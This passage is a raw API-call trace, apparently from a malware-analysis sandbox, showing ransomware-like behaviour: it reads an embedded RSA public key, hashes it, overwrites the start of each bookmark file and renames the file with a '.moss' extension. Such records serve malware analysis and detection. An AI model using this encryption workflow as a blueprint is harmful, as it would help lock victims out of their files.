lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.452] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.452] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x85, lpOverlapped=0x0) returned 1 [0171.452] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.452] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.452] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.452] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.452] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.453] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.453] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.453] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.453] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.453] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.453] GetLastError () returned 0x0 [0171.453] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.453] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.453] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.453] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.453] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.453] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.453] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.453] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.454] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.454] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.454] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.moss")) returned 1 [0171.456] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url") returned=".url" [0171.456] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.456] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=133) returned 1 [0171.456] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.460] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.460] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.461] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.461] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x85, lpOverlapped=0x0) returned 1 [0171.461] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.461] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.461] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.461] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.461] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.462] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.462] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.462] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.462] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.462] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.462] GetLastError () returned 0x0 [0171.463] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.463] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.463] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.463] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.463] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.463] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.463] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.463] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.464] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.464] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.464] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN.url.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn.url.moss")) returned 1 [0171.467] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url") returned=".url" [0171.467] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0171.470] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=133) returned 1 [0171.470] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0171.473] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.473] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0171.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0171.474] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x85, lpOverlapped=0x0) returned 1 [0171.474] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.474] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0171.474] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.474] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0171.474] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0171.475] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0171.475] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0171.475] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0171.475] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0171.475] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0171.475] GetLastError () returned 0x0 [0171.475] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0171.475] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0171.476] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0171.476] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0171.476] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0171.476] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0171.476] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0171.476] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0171.476] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.476] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0171.476] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSNBC News.url.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msnbc news.url.moss")) returned 1 [0171.478] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0171.478] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0171.478] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2840 | out: hHeap=0xcd0000) returned 1 [0171.478] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0171.478] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0171.478] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0171.478] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.478] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.478] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.478] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.478] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.478] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.478] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.478] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.478] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.478] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.478] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.478] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.478] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.478] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.478] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.478] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.478] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0171.479] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.479] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.479] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.479] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b4b098 [0171.479] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.479] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0171.479] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.479] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.479] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.479] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.479] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.479] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.479] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b48820 [0171.479] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0171.479] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.479] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.479] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.479] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0171.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0171.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f27c8 | out: hHeap=0xcd0000) returned 1 [0171.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f27c8 [0171.480] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0171.480] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: 